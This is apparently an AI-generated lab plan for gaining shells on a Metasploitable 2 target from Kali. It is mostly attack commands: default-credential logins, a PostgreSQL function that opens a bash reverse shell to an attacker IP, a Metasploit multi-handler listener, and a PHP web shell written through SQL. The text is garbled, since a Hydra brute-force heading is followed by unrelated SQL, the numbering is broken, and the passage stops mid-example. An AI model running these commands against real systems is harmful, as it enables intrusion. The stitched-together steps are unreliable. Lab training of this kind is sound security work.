Here’s a detailed command-oriented lab plan focusing exclusively on shell exploitation via two methods:
User Involvement (e.g., phishing, weak credentials).
No User Involvement (exploiting services and backdoors).
Lab Objective:
Gain shells on the Metasploitable 2 system through interactive and non-interactive methods.
1. Environment Setup
Ensure both Kali Linux (attacker) and Metasploitable 2 (target) are on the same network. Use their IP addresses for exploitation.
ping [Metasploitable 2 IP]
2. Gaining Shell Access via User Interaction
Step 1: Exploiting FTP with Weak Credentials
Manual Connection:
ftp [Metasploitable 2 IP]
# Log in using default credentials (e.g., msfadmin:msfadmin)
Download Payload via FTP:
ftp [Metasploitable 2 IP]
put reverse_shell.sh
Execute Payload:
bash reverse_shell.sh
Brute-forcing SSH passwords using a wordlist can be done with tools such as Hydra, Medusa, or Nmap scripts. Here’s how you can accomplish this, assuming you have permission for such activities as part of a penetration testing scenario.
1. Using Hydra
Hydra is a powerful tool for brute-forcing various protocols, including SSH.
CREATE OR REPLACE FUNCTION runcmd() RETURNS void AS $$
DECLARE
result TEXT;
BEGIN
result := system('bash -i >& /dev/tcp/[Your IP]/5555 0>&1');
END;
$$ LANGUAGE plpgsql;
SELECT runcmd();
Step 7: Multi-Handler Shell Listener
Set up Multi-Handler:
msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST [Your IP]
set LPORT 5555
run
These methods focus on gaining shells interactively (via weak credentials) and non-interactively (via exploits and backdoors). Would you like further customization for specific services or payloads?
Here’s an extended list with additional methods for shell exploitation using both user involvement and no user involvement techniques on Metasploitable 2. The aim is to include diverse services, exploits, and creative ways to gain a shell.
1. User Involvement Exploitation
Exploiting Weak Web Credentials
Upload Reverse Shell via PHPMyAdmin
Log in to http://[Metasploitable 2 IP]/phpmyadmin with default credentials (root:root).
Execute the following SQL command to write a PHP reverse shell:
CREATE TABLE cmd_shell (cmd BLOB);
INSERT INTO cmd_shell VALUES ('<?php system($_GET["cmd"]); ?>');